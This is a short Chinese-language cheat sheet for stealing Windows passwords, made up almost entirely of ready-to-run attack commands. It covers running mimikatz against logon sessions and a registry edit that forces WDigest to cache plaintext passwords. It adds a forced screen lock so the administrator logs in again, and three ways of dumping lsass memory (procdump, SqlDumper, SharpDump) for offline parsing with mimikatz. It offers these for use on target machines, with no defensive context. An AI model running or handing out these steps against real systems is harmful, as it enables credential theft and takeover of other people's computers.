一.windows2008以上不保存明文密碼解決辦法
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt
在默認情況下,當系統為win10或2012R2以上時,默認在內存緩存中禁止保存明文密碼,密碼字段顯示為null,此時可以通過以下方式開啟,但需要用戶重新登錄后才能成功抓取。
cmd: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
在開啟 Wdigest Auth 后,需要管理員重新登錄才能抓明文密碼。
強制鎖屏,讓管理員重新登錄。
rundll32 user32.dll,LockWorkStation
二.procdump+mimikatz
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"
三.SqlDumper + mimikatz
SqlDumper.exe默認存放在C:\Program Files\Microsoft SQL Server\number\Shared,number代表SQL Server的版本目標機沒有的話可以自己上傳
tasklist /svc |findstr lsass.exe
Sqldumper.exe 進程ID 0 0x01100
mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"
四.SharpDump+ mimikatz
https://github.com/GhostPack/SharpDump
編譯生成SharpDump.exe文件大小不超10kb
進入c:\windows\temp\將debug.bin文件提取出來修改后綴bin為zip解壓出來
mimikatz.exe "sekurlsa::minidump debug472" "sekurlsa::logonPasswords full" "exit"
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt